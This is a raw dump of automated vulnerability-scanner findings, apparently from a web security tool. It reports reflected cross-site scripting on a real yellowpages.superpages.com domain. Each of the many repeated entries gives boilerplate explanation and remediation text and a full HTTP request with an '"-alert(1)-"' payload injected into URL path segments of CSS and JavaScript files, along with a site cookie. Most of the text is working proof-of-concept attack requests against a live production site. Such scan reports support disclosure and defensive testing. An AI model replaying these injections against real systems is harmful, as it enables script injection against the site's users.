The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e3a4"-alert(1)-"31758302492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css2e3a4"-alert(1)-"31758302492/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90730"-alert(1)-"4bb8ef51e2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.css90730"-alert(1)-"4bb8ef51e2e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 556b3"-alert(1)-"77bf0060590 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common556b3"-alert(1)-"77bf0060590/css/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41a33"-alert(1)-"beea310258d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css41a33"-alert(1)-"beea310258d/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f374"-alert(1)-"75d234bf5b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css5f374"-alert(1)-"75d234bf5b6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba03"-alert(1)-"3926cf42cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondba03"-alert(1)-"3926cf42cc/css/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1c2"-alert(1)-"0be741eba7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css7f1c2"-alert(1)-"0be741eba7e/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b46"-alert(1)-"8a72cc31118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssc8b46"-alert(1)-"8a72cc31118 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63782"-alert(1)-"394d79fcb8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common63782"-alert(1)-"394d79fcb8e/css/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9c4"-alert(1)-"4085321ddc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssfa9c4"-alert(1)-"4085321ddc5/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2a5"-alert(1)-"1178fbe54b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.css2c2a5"-alert(1)-"1178fbe54b5 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f02bd"-alert(1)-"8e7372b3b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf02bd"-alert(1)-"8e7372b3b0f/css/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1fb5"-alert(1)-"a993f153324 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc1fb5"-alert(1)-"a993f153324/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9881e"-alert(1)-"469b370ffea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.css9881e"-alert(1)-"469b370ffea HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d360a"-alert(1)-"40ddcadb330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond360a"-alert(1)-"40ddcadb330/css/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a69"-alert(1)-"e7d21581496 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssb0a69"-alert(1)-"e7d21581496/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38477"-alert(1)-"3be17ea04e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css38477"-alert(1)-"3be17ea04e9 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 689e0"-alert(1)-"c3d47ce5218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common689e0"-alert(1)-"c3d47ce5218/css/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 899c2"-alert(1)-"d0b7d7ab651 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css899c2"-alert(1)-"d0b7d7ab651/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1c6"-alert(1)-"3fca270d8ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.css5b1c6"-alert(1)-"3fca270d8ea HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3386a"-alert(1)-"0a4cd452ce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3386a"-alert(1)-"0a4cd452ce0/js/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ffa9"-alert(1)-"878d80a85af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6ffa9"-alert(1)-"878d80a85af/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ad9"-alert(1)-"e46e8503c2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jse5ad9"-alert(1)-"e46e8503c2b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b391"-alert(1)-"ebbad8cca05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4b391"-alert(1)-"ebbad8cca05/js/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96835"-alert(1)-"ff658105077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js96835"-alert(1)-"ff658105077/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eb5a"-alert(1)-"60ab2b49064 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.js1eb5a"-alert(1)-"60ab2b49064 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f6c"-alert(1)-"db0fa239d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common99f6c"-alert(1)-"db0fa239d1a/js/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd66c"-alert(1)-"9f68db117ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbd66c"-alert(1)-"9f68db117ce/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b82c"-alert(1)-"40296947fc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js8b82c"-alert(1)-"40296947fc2 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
